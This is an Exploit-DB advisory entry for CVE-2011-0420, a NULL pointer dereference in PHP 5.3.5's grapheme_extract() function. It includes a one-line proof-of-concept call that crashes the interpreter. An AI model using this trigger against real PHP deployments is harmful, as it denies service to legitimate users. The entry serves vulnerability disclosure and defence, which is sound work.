PHP 5.3.5 - 'grapheme_extract' NULL Pointer Dereference Denial Of Service Vulnerability

2011-02-17T00:00:00
ID EDB-ID:35354
Type exploitdb
Reporter Maksymilian Arciemowicz
Modified 2011-02-17T00:00:00

Description

PHP 5.3.5 'grapheme_extract()' NULL Pointer Dereference Denial Of Service Vulnerability. CVE-2011-0420. Dos exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/46429/info

PHP is prone to a denial-of-service vulnerability caused by a NULL-pointer dereference.

An attacker can exploit this issue to cause an appliation written in PHP to crash, denying service to legitimate users.

PHP 5.3.5 is vulnerable; other versions may also be affected. 

The following proof-of-concept is available:

grapheme_extract('a',-1);